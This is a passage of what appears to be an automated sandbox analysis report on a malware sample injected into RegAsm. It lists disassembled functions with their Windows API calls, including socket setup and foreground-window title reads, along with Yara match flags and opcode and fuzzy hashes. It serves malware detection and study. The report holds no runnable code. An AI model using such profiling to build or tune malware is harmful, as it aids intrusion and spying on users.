                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: try_get_function
                                                                        • String ID: FlsAlloc
                                                                        • API String ID: 2742660187-671089009
                                                                        • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                        • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                                        • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                        • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                                                        Function 0041B7B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: GlobalMemoryStatus
                                                                        • String ID: @
                                                                        • API String ID: 1890195054-2766056989
                                                                        • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                        • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                        • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                        • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                        Function 0044F119 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
                                                                        • GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CodeInfoPageValid
                                                                        • String ID:
                                                                        • API String ID: 546120528-0
                                                                        • Opcode ID: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                                                                        • Instruction ID: 3b7bf12515eb554c774b4e527f81d40cffab4a6430697902d987c8214247c1f3
                                                                        • Opcode Fuzzy Hash: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                                                                        • Instruction Fuzzy Hash: BB5116749002469EFB24CF76C8816BBBBE5FF41304F1444BFD08687251D6BE994ACB99
                                                                        Function 10006E20 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                        • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CodeInfoPageValid
                                                                        • String ID:
                                                                        • API String ID: 546120528-0
                                                                        • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                        • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                                        • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                        • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                                        Function 0044EF58 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                          • Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
                                                                          • Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD
                                                                          • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                                        • _free.LIBCMT ref: 0044EFD0
                                                                        • _free.LIBCMT ref: 0044F006
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorLast_abort
                                                                        • String ID:
                                                                        • API String ID: 2991157371-0
                                                                        • Opcode ID: 6c0cb8569b147b13637b122a080b5d55873410717ba166906214e1e8c131c017
                                                                        • Instruction ID: 3a29b68b49955ca98559fee15c42126097606514ccea0e67eec2104835090475
                                                                        • Opcode Fuzzy Hash: 6c0cb8569b147b13637b122a080b5d55873410717ba166906214e1e8c131c017
                                                                        • Instruction Fuzzy Hash: FD31D531904104BFFB10EB6AD440B9EB7E4FF40329F2540AFE5149B2A1DB399D45CB48
                                                                        Function 10006C5F Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                          • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                          • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                          • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                          • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                          • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                          • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                        • _free.LIBCMT ref: 10006CD7
                                                                        • _free.LIBCMT ref: 10006D0D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorLast_abort
                                                                        • String ID:
                                                                        • API String ID: 2991157371-0
                                                                        • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                        • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                                        • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                        • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                                                        Function 004484CA Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7,00000000), ref: 0044852A
                                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc__crt_fast_encode_pointer
                                                                        • String ID:
                                                                        • API String ID: 2279764990-0
                                                                        • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                                                        • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                                                                        • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                                                        • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
                                                                        Function 00446185 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 004461A6
                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                        • HeapReAlloc.KERNEL32(00000000,00000000,?,?,0000000F,00000000,00432F02,00000000,0000000F,0042F90C,?,?,004319B3,?,?,00000000), ref: 004461E2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Heap$AllocAllocate_free
                                                                        • String ID:
                                                                        • API String ID: 2447670028-0
                                                                        • Opcode ID: 0c50226df9aed064d9fc72c30ff8f5201140dd52271d3dd40973ea300b8a0024
                                                                        • Instruction ID: bbbbf11ac8836aedddebace835184d628c0e8eb9448606daf7135ff7baabef38
                                                                        • Opcode Fuzzy Hash: 0c50226df9aed064d9fc72c30ff8f5201140dd52271d3dd40973ea300b8a0024
                                                                        • Instruction Fuzzy Hash: ACF0683120051566BF212A16AD01B6F375D8F83B75F17411BF91466292DE3CD911916F
                                                                        Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                          • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateEventStartupsocket
                                                                        • String ID:
                                                                        • API String ID: 1953588214-0
                                                                        • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                                        • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                                                        • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                                        • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                        Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                                                        • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                                                        • Opcode Fuzzy Hash: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                                                        • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                                                        Function 10001EEC Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                        • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                        • String ID:
                                                                        • API String ID: 3750050125-0
                                                                        • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                        • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                        • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                        • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                                        Function 0041BA96 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Window$ForegroundText
                                                                        • String ID:
                                                                        • API String ID: 29597999-0
                                                                        • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                                                        • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                                                                        • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                                                        • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                                                                        Function 0043A3EC Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00438D94: try_get_function.LIBVCRUNTIME ref: 00438DA9
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40A
                                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A415
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                        • String ID:
                                                                        • API String ID: 806969131-0
                                                                        • Opcode ID: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
                                                                        • Instruction ID: 13a2799ba917d8b657c14e130d7338f5d7a652e6d8bc03527a2a5cb893e190b1
                                                                        • Opcode Fuzzy Hash: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
                                                                        • Instruction Fuzzy Hash: 23D0A920088310241C14A3792C0F19B53442A3A7BCF70726FFAF4861C3EEDC8062612F
                                                                        Function 100038E8 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                        • String ID:
                                                                        • API String ID: 806969131-0
                                                                        • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                        • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                                        • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                        • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                                        Function 10005C45 Relevance: 1.6, APIs: 1, Instructions: 65COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: __crt_fast_encode_pointer
                                                                        • String ID:
                                                                        • API String ID: 3768137683-0
                                                                        • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                        • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                        • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                        • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                                        Function 004118B2 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                                                                        • Instruction ID: 7a76c105a712203ac593d2e3a9180375903654e9edbd33c69f6c8f8a5c58a470
                                                                        • Opcode Fuzzy Hash: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                                                                        • Instruction Fuzzy Hash: 971123B27201019FD7149B18C890FA6B76AFF51721B59425AE202CB3B2DB30EC91C694
                                                                        Function 0043AA1B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __alldvrm
                                                                        • String ID:
                                                                        • API String ID: 65215352-0
                                                                        • Opcode ID: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
                                                                        • Instruction ID: 96d9d97d68b67d0c8e80b5665a39335b0ee5c72343be31c2f0b4d265a228e715
                                                                        • Opcode Fuzzy Hash: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
                                                                        • Instruction Fuzzy Hash: 08012872950318BFDB24EF64C942B6E77ECEB0531DF10846FE48597240C6799D00C75A
                                                                        Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                        • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                                                        • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                        • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                                                        Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Startup
                                                                        • String ID:
                                                                        • API String ID: 724789610-0
                                                                        • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                                        • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                                                        • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                                        • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                                                                        Function 004027A7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Deallocatestd::_
                                                                        • String ID:
                                                                        • API String ID: 1323251999-0
                                                                        • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                        • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                        • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                        • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                        Function 00426CC8 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
